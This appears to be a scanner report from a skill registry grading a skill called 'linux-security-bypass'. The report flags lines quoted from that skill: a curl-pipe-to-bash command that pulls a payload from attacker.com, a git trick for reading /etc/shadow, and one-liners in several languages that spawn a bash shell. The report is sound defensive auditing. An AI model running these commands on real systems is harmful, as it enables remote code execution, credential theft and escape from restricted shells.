B
SCORE 75 / 100
$skillox install linux-security-bypassSoon
Sign in to followFollowing emails you when a re-scan drops the grade. Opt-out is per-creator on /account/billing.
Why grade B?
score · 75 / 100The current grade reflects 2 high-severity findings (any HIGH → B).
0 CRIT2 HIGH3 MED0 LOW
To reach a higher grade
- AReach Atarget score 95
Resolve all 2 HIGH + 1 of 3 MED (cap is 2).
Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.
Latest scan findings
Scan crawl-lun8jonh1uw4u2tg0jp60lgp · Thu, 28 May 2026 17:28:53 GMT · 2ms
highDangerous shell pattern: curl | shellThe skill contains a shell command pattern (`curl | shell`) commonly used in destructive or supply-chain attacks.▾
Dangerous shell pattern: curl | shell
The skill contains a shell command pattern (`curl | shell`) commonly used in destructive or supply-chain attacks.
106
107# Usage: pipe any ELF binary through DDexec
108curl -sL https://attacker.com/payload | bash ddexec.sh← curl | shell — common in destructive or supply-chain attacks
109
110# How it works:
highSensitive filesystem path referencedThe skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.▾
Sensitive filesystem path referenced
The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
83# Use allowed command to read files
84git log --oneline --all -p # git can read arbitrary files
85git diff /dev/null /etc/shadow← sensitive path — credential-exfiltration vector
86```
87
medArbitrary subprocess execution detectedThe skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.▾
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
57| Interpreter | Command |
58|---|---|
59| Python | `python3 -c 'import pty; pty.spawn("/bin/bash")'` |← spawns a subprocess outside declared capabilities
60| Perl | `perl -e 'exec "/bin/bash";'` |
61| Ruby | `ruby -e 'exec "/bin/bash"'` |
medArbitrary subprocess execution detectedThe skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.▾
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
62| Lua | `lua -e 'os.execute("/bin/bash")'` |
63| PHP | `php -r 'system("/bin/bash");'` |
64| Node.js | `node -e 'require("child_process").spawn("/bin/bash",{stdio:[0,1,2]})'` |← spawns a subprocess outside declared capabilities
65| AWK | `awk 'BEGIN {system("/bin/bash")}'` |
66
medNo capability manifest declaredThe skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.rule: no-manifest▾
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule:
no-manifestskillox.io/c/linux-security-bypass